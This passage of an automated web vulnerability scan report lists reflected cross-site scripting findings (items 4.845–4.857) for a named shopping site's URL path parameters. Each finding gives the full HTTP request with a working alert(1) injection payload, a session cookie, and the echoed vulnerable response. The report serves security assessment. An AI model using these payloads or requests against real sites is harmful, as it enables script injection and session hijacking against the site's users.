Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:51:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingb7b37"><a>c4d399baf66">
...[SNIP]...

4.845. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Shoes/26 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Shoes/26

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e087'-alert(1)-'c386b19e7ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping7e087'-alert(1)-'c386b19e7ff/Clothing-Accessories/194367784/Shoes/26 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:59:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping7e087'-alert(1)-'c386b19e7ff/Clothing-Accessories/194367784/Shoes/26';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.846. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Shoes/26 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Shoes/26

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d2993<script>alert(1)</script>75d3d52f674 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessoriesd2993<script>alert(1)</script>75d3d52f674/194367784/Shoes/26 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:03:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessoriesd2993<script>alert(1)</script>75d3d52f674 <a href="#" id="backlink">
...[SNIP]...

4.847. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Shoes/26 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Shoes/26

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14482'-alert(1)-'ad7f2c767e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories14482'-alert(1)-'ad7f2c767e5/194367784/Shoes/26 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:02:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories14482'-alert(1)-'ad7f2c767e5/194367784/Shoes/26';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.848. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Shoes/26 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Shoes/26

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2780c'-alert(1)-'6021778fc8b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/1943677842780c'-alert(1)-'6021778fc8b/Shoes/26 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:05:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories/1943677842780c'-alert(1)-'6021778fc8b/Shoes/26';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.849. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Shoes/26 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Shoes/26

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46cc6'-alert(1)-'bb7743f175e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Shoes46cc6'-alert(1)-'bb7743f175e/26 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:09:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Clothing-Accessories/194367784/Shoes46cc6'-alert(1)-'bb7743f175e/26';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.850. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Shoes/26 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Shoes/26

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bbcd'-alert(1)-'908d6412763 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Shoes/267bbcd'-alert(1)-'908d6412763 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:15:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Clothing-Accessories/194367784/Shoes/267bbcd'-alert(1)-'908d6412763';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.851. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Swimwear/53 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Swimwear/53

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a6fa"><a>edfe7e65f36 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping3a6fa"><a>edfe7e65f36/Clothing-Accessories/194367784/Swimwear/53 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:14:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping3a6fa"><a>edfe7e65f36">
...[SNIP]...

4.852. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Swimwear/53 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Swimwear/53

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbd4e'-alert(1)-'c5cf03e5ec1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shoppingdbd4e'-alert(1)-'c5cf03e5ec1/Clothing-Accessories/194367784/Swimwear/53 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:26:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shoppingdbd4e'-alert(1)-'c5cf03e5ec1/Clothing-Accessories/194367784/Swimwear/53';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.853. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Swimwear/53 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Swimwear/53

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f2d0'-alert(1)-'39bc71dac90 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories6f2d0'-alert(1)-'39bc71dac90/194367784/Swimwear/53 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:32:31 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories6f2d0'-alert(1)-'39bc71dac90/194367784/Swimwear/53';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.854. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Swimwear/53 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Swimwear/53

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4fd2c<script>alert(1)</script>10f60d99e65 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessories4fd2c<script>alert(1)</script>10f60d99e65/194367784/Swimwear/53 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:33:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessories4fd2c<script>alert(1)</script>10f60d99e65 <a href="#" id="backlink">
...[SNIP]...

4.855. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Swimwear/53 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Swimwear/53

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 447c8'-alert(1)-'a0cd7cd231e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784447c8'-alert(1)-'a0cd7cd231e/Swimwear/53 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:37:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/194367784447c8'-alert(1)-'a0cd7cd231e/Swimwear/53';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.856. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Swimwear/53 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Swimwear/53

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc070'-alert(1)-'489ba6c8d0d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Swimwearbc070'-alert(1)-'489ba6c8d0d/53 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:48:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62248

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories/194367784/Swimwearbc070'-alert(1)-'489ba6c8d0d/53';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.857. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Swimwear/53 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Swimwear/53

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1880'-alert(1)-'4070e905925 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Swimwear/53f1880'-alert(1)-'4070e905925 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:53:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55297

